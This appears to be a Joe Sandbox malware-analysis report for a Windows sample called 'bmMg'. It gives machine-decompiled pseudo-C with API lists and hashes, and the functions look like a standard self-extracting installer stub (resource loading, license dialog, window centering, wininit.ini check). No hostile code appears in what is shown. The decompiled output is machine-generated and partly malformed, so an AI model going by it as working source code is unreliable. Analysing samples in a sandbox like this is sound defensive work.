                                                                      • Opcode Fuzzy Hash: 643472a08c522f5abda10d25bd833a1da242c41b87e3505aeb41fb45cac7f958
                                                                      • Instruction Fuzzy Hash: 9701B132644518ABEB16AF64DC0C9FD3A64EB05F20F104411F947865B0CB749F51FB81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 95%
                                                                      			E00F82AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
                                                                      				signed int _v8;
                                                                      				char _v268;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t16;
                                                                      				int _t21;
                                                                      				char _t32;
                                                                      				intOrPtr _t34;
                                                                      				char* _t38;
                                                                      				char _t42;
                                                                      				char* _t44;
                                                                      				CHAR* _t52;
                                                                      				intOrPtr* _t55;
                                                                      				CHAR* _t59;
                                                                      				void* _t62;
                                                                      				CHAR* _t64;
                                                                      				CHAR* _t65;
                                                                      				signed int _t66;
                                                                      
                                                                      				_t60 = __edx;
                                                                      				_t16 =  *0xf88004; // 0x644c7055
                                                                      				_t17 = _t16 ^ _t66;
                                                                      				_v8 = _t16 ^ _t66;
                                                                      				_t65 = _a4;
                                                                      				_t44 = __edx;
                                                                      				_t64 = __ecx;
                                                                      				if( *((char*)(__ecx)) != 0) {
                                                                      					GetModuleFileNameA( *0xf89a3c,  &_v268, 0x104);
                                                                      					while(1) {
                                                                      						_t17 =  *_t64;
                                                                      						if(_t17 == 0) {
                                                                      							break;
                                                                      						}
                                                                      						_t21 = IsDBCSLeadByte(_t17);
                                                                      						 *_t65 =  *_t64;
                                                                      						if(_t21 != 0) {
                                                                      							_t65[1] = _t64[1];
                                                                      						}
                                                                      						if( *_t64 != 0x23) {
                                                                      							L19:
                                                                      							_t65 = CharNextA(_t65);
                                                                      						} else {
                                                                      							_t64 = CharNextA(_t64);
                                                                      							if(CharUpperA( *_t64) != 0x44) {
                                                                      								if(CharUpperA( *_t64) != 0x45) {
                                                                      									if( *_t64 == 0x23) {
                                                                      										goto L19;
                                                                      									}
                                                                      								} else {
                                                                      									E00F81680(_t65, E00F817C8(_t44, _t65),  &_v268);
                                                                      									_t52 = _t65;
                                                                      									_t14 =  &(_t52[1]); // 0x2
                                                                      									_t60 = _t14;
                                                                      									do {
                                                                      										_t32 =  *_t52;
                                                                      										_t52 =  &(_t52[1]);
                                                                      									} while (_t32 != 0);
                                                                      									goto L17;
                                                                      								}
                                                                      							} else {
                                                                      								E00F865E8( &_v268);
                                                                      								_t55 =  &_v268;
                                                                      								_t62 = _t55 + 1;
                                                                      								do {
                                                                      									_t34 =  *_t55;
                                                                      									_t55 = _t55 + 1;
                                                                      								} while (_t34 != 0);
                                                                      								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
                                                                      								if(_t38 != 0 &&  *_t38 == 0x5c) {
                                                                      									 *_t38 = 0;
                                                                      								}
                                                                      								E00F81680(_t65, E00F817C8(_t44, _t65),  &_v268);
                                                                      								_t59 = _t65;
                                                                      								_t12 =  &(_t59[1]); // 0x2
                                                                      								_t60 = _t12;
                                                                      								do {
                                                                      									_t42 =  *_t59;
                                                                      									_t59 =  &(_t59[1]);
                                                                      								} while (_t42 != 0);
                                                                      								L17:
                                                                      								_t65 =  &(_t65[_t52 - _t60]);
                                                                      							}
                                                                      						}
                                                                      						_t64 = CharNextA(_t64);
                                                                      					}
                                                                      					 *_t65 = _t17;
                                                                      				}
                                                                      				return E00F86CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
                                                                      			}

                                                                      APIs
                                                                      • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00F82AE6
                                                                      • IsDBCSLeadByte.KERNEL32(00000000), ref: 00F82AF2
                                                                      • CharNextA.USER32(?), ref: 00F82B12
                                                                      • CharUpperA.USER32 ref: 00F82B1E
                                                                      • CharPrevA.USER32(?,?), ref: 00F82B55
                                                                      • CharNextA.USER32(?), ref: 00F82BD4
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                                      • String ID:
                                                                      • API String ID: 571164536-0
                                                                      • Opcode ID: a8ca9a89a3e3fc53b4620afeba94990907e5431b106ec9ffc7a6fa276ca0ee91
                                                                      • Instruction ID: 9661ef238e8b256b6c7a8b87863ba2d7c40344dd726906a6f11e53b3f500099f
                                                                      • Opcode Fuzzy Hash: a8ca9a89a3e3fc53b4620afeba94990907e5431b106ec9ffc7a6fa276ca0ee91
                                                                      • Instruction Fuzzy Hash: D6413A34A051495FEF55AF348C54AFD7BA9DF92310F14009AE8C287202DF399E46EB50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 86%
                                                                      			E00F843D0(struct HWND__* __ecx, struct HWND__* __edx) {
                                                                      				signed int _v8;
                                                                      				struct tagRECT _v24;
                                                                      				struct tagRECT _v40;
                                                                      				struct HWND__* _v44;
                                                                      				intOrPtr _v48;
                                                                      				int _v52;
                                                                      				intOrPtr _v56;
                                                                      				int _v60;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t29;
                                                                      				void* _t53;
                                                                      				intOrPtr _t56;
                                                                      				int _t59;
                                                                      				struct HWND__* _t63;
                                                                      				struct HWND__* _t67;
                                                                      				struct HWND__* _t68;
                                                                      				struct HDC__* _t69;
                                                                      				int _t72;
                                                                      				signed int _t74;
                                                                      
                                                                      				_t63 = __edx;
                                                                      				_t29 =  *0xf88004; // 0x644c7055
                                                                      				_v8 = _t29 ^ _t74;
                                                                      				_t68 = __edx;
                                                                      				_v44 = __ecx;
                                                                      				GetWindowRect(__ecx,  &_v40);
                                                                      				_t53 = _v40.bottom - _v40.top;
                                                                      				_v48 = _v40.right - _v40.left;
                                                                      				GetWindowRect(_t68,  &_v24);
                                                                      				_v56 = _v24.bottom - _v24.top;
                                                                      				_t69 = GetDC(_v44);
                                                                      				_v52 = GetDeviceCaps(_t69, 8);
                                                                      				_v60 = GetDeviceCaps(_t69, 0xa);
                                                                      				ReleaseDC(_v44, _t69);
                                                                      				_t56 = _v48;
                                                                      				asm("cdq");
                                                                      				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
                                                                      				_t67 = 0;
                                                                      				if(_t72 >= 0) {
                                                                      					_t63 = _v52;
                                                                      					if(_t72 + _t56 > _t63) {
                                                                      						_t72 = _t63 - _t56;
                                                                      					}
                                                                      				} else {
                                                                      					_t72 = _t67;
                                                                      				}
                                                                      				asm("cdq");
                                                                      				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
                                                                      				if(_t59 >= 0) {
                                                                      					_t63 = _v60;
                                                                      					if(_t59 + _t53 > _t63) {
                                                                      						_t59 = _t63 - _t53;
                                                                      					}
                                                                      				} else {
                                                                      					_t59 = _t67;
                                                                      				}
                                                                      				return E00F86CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
                                                                      			}

                                                                      APIs
                                                                      • GetWindowRect.USER32(?,?), ref: 00F843F1
                                                                      • GetWindowRect.USER32(00000000,?), ref: 00F8440B
                                                                      • GetDC.USER32(?), ref: 00F84423
                                                                      • GetDeviceCaps.GDI32(00000000,00000008), ref: 00F8442E
                                                                      • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00F8443A
                                                                      • ReleaseDC.USER32(?,00000000), ref: 00F84447
                                                                      • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,00000001,?), ref: 00F844A2
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: Window$CapsDeviceRect$Release
                                                                      • String ID:
                                                                      • API String ID: 2212493051-0
                                                                      • Opcode ID: 3ec5185e1f41faafe966545b1ed98b1e943bcad60116f30e01ac2d99372ed2ba
                                                                      • Instruction ID: 5cdb442add0bc3976f4e91dee0f0fb7790f49e40224488fddb167cd6dc9ed3c0
                                                                      • Opcode Fuzzy Hash: 3ec5185e1f41faafe966545b1ed98b1e943bcad60116f30e01ac2d99372ed2ba
                                                                      • Instruction Fuzzy Hash: 6A315A32E0051DAFDB14DFB8DD889EEBBB5EB89310F254169F805F3250DA30AC059B60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 53%
                                                                      			E00F86298(intOrPtr __ecx, intOrPtr* __edx) {
                                                                      				signed int _v8;
                                                                      				char _v28;
                                                                      				intOrPtr _v32;
                                                                      				struct HINSTANCE__* _v36;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t16;
                                                                      				struct HRSRC__* _t21;
                                                                      				intOrPtr _t26;
                                                                      				void* _t30;
                                                                      				struct HINSTANCE__* _t36;
                                                                      				intOrPtr* _t40;
                                                                      				void* _t41;
                                                                      				intOrPtr* _t44;
                                                                      				intOrPtr* _t45;
                                                                      				void* _t47;
                                                                      				signed int _t50;
                                                                      				struct HINSTANCE__* _t51;
                                                                      
                                                                      				_t44 = __edx;
                                                                      				_t16 =  *0xf88004; // 0x644c7055
                                                                      				_v8 = _t16 ^ _t50;
                                                                      				_t46 = 0;
                                                                      				_v32 = __ecx;
                                                                      				_v36 = 0;
                                                                      				_t36 = 1;
                                                                      				E00F8171E( &_v28, 0x14, "UPDFILE%lu", 0);
                                                                      				while(1) {
                                                                      					_t51 = _t51 + 0x10;
                                                                      					_t21 = FindResourceA(_t46,  &_v28, 0xa);
                                                                      					if(_t21 == 0) {
                                                                      						break;
                                                                      					}
                                                                      					_t45 = LockResource(LoadResource(_t46, _t21));
                                                                      					if(_t45 == 0) {
                                                                      						 *0xf89124 = 0x80070714;
                                                                      						_t36 = _t46;
                                                                      					} else {
                                                                      						_t5 = _t45 + 8; // 0x8
                                                                      						_t44 = _t5;
                                                                      						_t40 = _t44;
                                                                      						_t6 = _t40 + 1; // 0x9
                                                                      						_t47 = _t6;
                                                                      						do {
                                                                      							_t26 =  *_t40;
                                                                      							_t40 = _t40 + 1;
                                                                      						} while (_t26 != 0);
                                                                      						_t41 = _t40 - _t47;
                                                                      						_t46 = _t51;
                                                                      						_t7 = _t41 + 1; // 0xa
                                                                      						 *0xf8a288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
                                                                      						_t30 = _v32();
                                                                      						if(_t51 != _t51) {
                                                                      							asm("int 0x29");
                                                                      						}
                                                                      						_push(_t45);
                                                                      						if(_t30 == 0) {
                                                                      							_t36 = 0;
                                                                      							FreeResource(??);
                                                                      						} else {
                                                                      							FreeResource();
                                                                      							_v36 = _v36 + 1;
                                                                      							E00F8171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
                                                                      							_t46 = 0;
                                                                      							continue;
                                                                      						}
                                                                      					}
                                                                      					L12:
                                                                      					return E00F86CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
                                                                      				}
                                                                      				goto L12;
                                                                      			}

                                                                      APIs
                                                                        • Part of subcall function 00F8171E: _vsnprintf.MSVCRT ref: 00F81750
                                                                      • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,00F851CA,00000004,00000024,00F82F71,?,00000002,00000000), ref: 00F862CD
                                                                      • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,00F851CA,00000004,00000024,00F82F71,?,00000002,00000000), ref: 00F862D4
                                                                      • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00F851CA,00000004,00000024,00F82F71,?,00000002,00000000), ref: 00F8631B
                                                                      • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00F86345
                                                                      • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00F851CA,00000004,00000024,00F82F71,?,00000002,00000000), ref: 00F86357
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                      • String ID: UPDFILE%lu
                                                                      • API String ID: 2922116661-2329316264
                                                                      • Opcode ID: fe12ebcf1929f11c5a9e7d1b056afb56cfede8c5affcc726db414384a53fa5e1
                                                                      • Instruction ID: 096558f961a4bfc61cf7c631631876f6364363db60d10102d41139e112eec9ba
                                                                      • Opcode Fuzzy Hash: fe12ebcf1929f11c5a9e7d1b056afb56cfede8c5affcc726db414384a53fa5e1
                                                                      • Instruction Fuzzy Hash: C121F671A00219ABEB10AFA4DC499FE7B7CFB44710B00021AF902E3241DB359D02ABE1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 94%
                                                                      			E00F8681F(void* __ebx) {
                                                                      				signed int _v8;
                                                                      				char _v20;
                                                                      				struct _OSVERSIONINFOA _v168;
                                                                      				void* _v172;
                                                                      				int* _v176;
                                                                      				int _v180;
                                                                      				int _v184;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t19;
                                                                      				long _t31;
                                                                      				signed int _t35;
                                                                      				void* _t36;
                                                                      				intOrPtr _t41;
                                                                      				signed int _t44;
                                                                      
                                                                      				_t36 = __ebx;
                                                                      				_t19 =  *0xf88004; // 0x644c7055
                                                                      				_v8 = _t19 ^ _t44;
                                                                      				_t41 =  *0xf881d8; // 0xfffffffe
                                                                      				_t43 = 0;
                                                                      				_v180 = 0xc;
                                                                      				_v176 = 0;
                                                                      				if(_t41 == 0xfffffffe) {
                                                                      					 *0xf881d8 = 0;
                                                                      					_v168.dwOSVersionInfoSize = 0x94;
                                                                      					if(GetVersionExA( &_v168) == 0) {
                                                                      						L12:
                                                                      						_t41 =  *0xf881d8; // 0xfffffffe
                                                                      					} else {
                                                                      						_t41 = 1;
                                                                      						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
                                                                      							goto L12;
                                                                      						} else {
                                                                      							_t31 = RegQueryValueExA(_v172, 0xf81140, 0,  &_v184,  &_v20,  &_v180);
                                                                      							_t43 = _t31;
                                                                      							RegCloseKey(_v172);
                                                                      							if(_t31 != 0) {
                                                                      								goto L12;
                                                                      							} else {
                                                                      								_t40 =  &_v176;
                                                                      								if(E00F866F9( &_v20,  &_v176) == 0) {
                                                                      									goto L12;
                                                                      								} else {
                                                                      									_t35 = _v176 & 0x000003ff;
                                                                      									if(_t35 == 1 || _t35 == 0xd) {
                                                                      										 *0xf881d8 = _t41;
                                                                      									} else {
                                                                      										goto L12;
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				return E00F86CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
                                                                      			}

                                                                      APIs
                                                                      • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00F8686E
                                                                      • GetSystemMetrics.USER32(0000004A), ref: 00F868A7
                                                                      • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00F868CC
                                                                      • RegQueryValueExA.ADVAPI32(?,00F81140,00000000,?,?,0000000C), ref: 00F868F4
                                                                      • RegCloseKey.ADVAPI32(?), ref: 00F86902
                                                                        • Part of subcall function 00F866F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,00F8691A), ref: 00F86741
                                                                      Strings
                                                                      • Control Panel\Desktop\ResourceLocale, xrefs: 00F868C2
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                      • String ID: Control Panel\Desktop\ResourceLocale
                                                                      • API String ID: 3346862599-1109908249
                                                                      • Opcode ID: 63292bd12a7d01b1a19ff9d36df6a02092d7f4ef4ff2bb8df984a6fff1e343d3
                                                                      • Instruction ID: 5e4cdcefcdd49df0254a7cd117f3542546a212dab8753b31df69f90f0481b5ef
                                                                      • Opcode Fuzzy Hash: 63292bd12a7d01b1a19ff9d36df6a02092d7f4ef4ff2bb8df984a6fff1e343d3
                                                                      • Instruction Fuzzy Hash: 2E313C31E00228DFDB31AB51DD45BEAB7B9EB45778F0001A5E949E6180DB309E86EF52
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00F83A3F(void* __eflags) {
                                                                      				void* _t3;
                                                                      				void* _t9;
                                                                      				CHAR* _t16;
                                                                      
                                                                      				_t16 = "LICENSE";
                                                                      				_t1 = E00F8468F(_t16, 0, 0) + 1; // 0x1
                                                                      				_t3 = LocalAlloc(0x40, _t1);
                                                                      				 *0xf88d4c = _t3;
                                                                      				if(_t3 != 0) {
                                                                      					_t19 = _t16;
                                                                      					if(E00F8468F(_t16, _t3, _t28) != 0) {
                                                                      						if(lstrcmpA( *0xf88d4c, "<None>") == 0) {
                                                                      							LocalFree( *0xf88d4c);
                                                                      							L9:
                                                                      							 *0xf89124 = 0;
                                                                      							return 1;
                                                                      						}
                                                                      						_t9 = E00F86517(_t19, 0x7d1, 0, E00F83100, 0, 0);
                                                                      						LocalFree( *0xf88d4c);
                                                                      						if(_t9 != 0) {
                                                                      							goto L9;
                                                                      						}
                                                                      						 *0xf89124 = 0x800704c7;
                                                                      						L2:
                                                                      						return 0;
                                                                      					}
                                                                      					E00F844B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                      					LocalFree( *0xf88d4c);
                                                                      					 *0xf89124 = 0x80070714;
                                                                      					goto L2;
                                                                      				}
                                                                      				E00F844B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                      				 *0xf89124 = E00F86285();
                                                                      				goto L2;
                                                                      			}

                                                                      APIs
                                                                        • Part of subcall function 00F8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F846A0
                                                                        • Part of subcall function 00F8468F: SizeofResource.KERNEL32(00000000,00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846A9
                                                                        • Part of subcall function 00F8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F846C3
                                                                        • Part of subcall function 00F8468F: LoadResource.KERNEL32(00000000,00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846CC
                                                                        • Part of subcall function 00F8468F: LockResource.KERNEL32(00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846D3
                                                                        • Part of subcall function 00F8468F: memcpy_s.MSVCRT ref: 00F846E5
                                                                        • Part of subcall function 00F8468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846EF
                                                                      • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00F82F64,?,00000002,00000000), ref: 00F83A5D
                                                                      • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00F83AB3
                                                                        • Part of subcall function 00F844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00F84518
                                                                        • Part of subcall function 00F844B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00F84554
                                                                        • Part of subcall function 00F86285: GetLastError.KERNEL32(00F85BBC), ref: 00F86285
                                                                      • lstrcmpA.KERNEL32(<None>,00000000), ref: 00F83AD0
                                                                      • LocalFree.KERNEL32 ref: 00F83B13
                                                                        • Part of subcall function 00F86517: FindResourceA.KERNEL32(00F80000,000007D6,00000005), ref: 00F8652A
                                                                        • Part of subcall function 00F86517: LoadResource.KERNEL32(00F80000,00000000,?,?,00F82EE8,00000000,00F819E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00F86538
                                                                        • Part of subcall function 00F86517: DialogBoxIndirectParamA.USER32(00F80000,00000000,00000547,00F819E0,00000000), ref: 00F86557
                                                                        • Part of subcall function 00F86517: FreeResource.KERNEL32(00000000,?,?,00F82EE8,00000000,00F819E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00F86560
                                                                      • LocalFree.KERNEL32(00000000,00F83100,00000000,00000000), ref: 00F83AF4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                      • String ID: <None>$LICENSE
                                                                      • API String ID: 2414642746-383193767
                                                                      • Opcode ID: 406b4e378b7158b032ef692b86b51c349143a542b2ab3f86b1b221eb43cd2b28
                                                                      • Instruction ID: 6a8943fccb5941db224efa4346a7741be0122548405fb68394f72c7b7cbc4e2e
                                                                      • Opcode Fuzzy Hash: 406b4e378b7158b032ef692b86b51c349143a542b2ab3f86b1b221eb43cd2b28
                                                                      • Instruction Fuzzy Hash: 2611D672704205ABD724BF729C0DFF779B9EBD5B50B10412EB541DA1B1EABD9802B720
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 94%
                                                                      			E00F824E0(void* __ebx) {
                                                                      				signed int _v8;
                                                                      				char _v268;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t7;
                                                                      				void* _t20;
                                                                      				long _t26;
                                                                      				signed int _t27;
                                                                      
                                                                      				_t20 = __ebx;
                                                                      				_t7 =  *0xf88004; // 0x644c7055
                                                                      				_v8 = _t7 ^ _t27;
                                                                      				_t25 = 0x104;
                                                                      				_t26 = 0;
                                                                      				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                      					E00F8658A( &_v268, 0x104, "wininit.ini");
                                                                      					WritePrivateProfileStringA(0, 0, 0,  &_v268);
                                                                      					_t25 = _lopen( &_v268, 0x40);
                                                                      					if(_t25 != 0xffffffff) {
                                                                      						_t26 = _llseek(_t25, 0, 2);
                                                                      						_lclose(_t25);
                                                                      					}
                                                                      				}
                                                                      				return E00F86CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
                                                                      			}












                                                                      APIs
                                                                      • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00F82506
                                                                      • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 00F8252C
                                                                      • _lopen.KERNEL32(?,00000040), ref: 00F8253B
                                                                      • _llseek.KERNEL32(00000000,00000000,00000002), ref: 00F8254C
                                                                      • _lclose.KERNEL32(00000000), ref: 00F82555
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                      • String ID: wininit.ini
                                                                      • API String ID: 3273605193-4206010578
                                                                      • Opcode ID: dc81203c369446bbc4cd6c1a2683949f007b9022488b1e5f08c39ce59561e621
                                                                      • Instruction ID: 332e8665e8469580608c41832836f5eab2903e12a3eb633747f354da73c673ee
                                                                      • Opcode Fuzzy Hash: dc81203c369446bbc4cd6c1a2683949f007b9022488b1e5f08c39ce59561e621
                                                                      • Instruction Fuzzy Hash: 7E01B532A0011867D720AB65DC0CEEF7B7CEB45760F040155FA49D7190DE749E46DB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 75%
                                                                      			E00F836EE(CHAR* __ecx) {
                                                                      				signed int _v8;
                                                                      				char _v268;
                                                                      				struct _OSVERSIONINFOA _v416;
                                                                      				signed int _v420;
                                                                      				signed int _v424;
                                                                      				CHAR* _v428;
                                                                      				CHAR* _v432;
                                                                      				signed int _v436;
                                                                      				CHAR* _v440;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t72;
                                                                      				CHAR* _t77;
                                                                      				CHAR* _t91;
                                                                      				CHAR* _t94;
                                                                      				int _t97;
                                                                      				CHAR* _t98;
                                                                      				signed char _t99;
                                                                      				CHAR* _t104;
                                                                      				signed short _t107;
                                                                      				signed int _t109;
                                                                      				short _t113;
                                                                      				void* _t114;
                                                                      				signed char _t115;
                                                                      				short _t119;
                                                                      				CHAR* _t123;
                                                                      				CHAR* _t124;
                                                                      				CHAR* _t129;
                                                                      				signed int _t131;
                                                                      				signed int _t132;
                                                                      				CHAR* _t135;
                                                                      				CHAR* _t138;
                                                                      				signed int _t139;
                                                                      
                                                                      				_t72 =  *0xf88004; // 0x644c7055
                                                                      				_v8 = _t72 ^ _t139;
                                                                      				_v416.dwOSVersionInfoSize = 0x94;
                                                                      				_t115 = __ecx;
                                                                      				_t135 = 0;
                                                                      				_v432 = __ecx;
                                                                      				_t138 = 0;
                                                                      				if(GetVersionExA( &_v416) != 0) {
                                                                      					_t133 = _v416.dwMajorVersion;
                                                                      					_t119 = 2;
                                                                      					_t77 = _v416.dwPlatformId - 1;
                                                                      					__eflags = _t77;
                                                                      					if(_t77 == 0) {
                                                                      						_t119 = 0;
                                                                      						__eflags = 1;
                                                                      						 *0xf88184 = 1;
                                                                      						 *0xf88180 = 1;
                                                                      						L13:
                                                                      						 *0xf89a40 = _t119;
                                                                      						L14:
                                                                      						__eflags =  *0xf88a34 - _t138; // 0x0
                                                                      						if(__eflags != 0) {
                                                                      							goto L66;
                                                                      						}
                                                                      						__eflags = _t115;
                                                                      						if(_t115 == 0) {
                                                                      							goto L66;
                                                                      						}
                                                                      						_v428 = _t135;
                                                                      						__eflags = _t119;
                                                                      						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
                                                                      						_t11 =  &_v420;
                                                                      						 *_t11 = _v420 & _t138;
                                                                      						__eflags =  *_t11;
                                                                      						_v440 = _t115;
                                                                      						do {
                                                                      							_v424 = _t135 * 0x18;
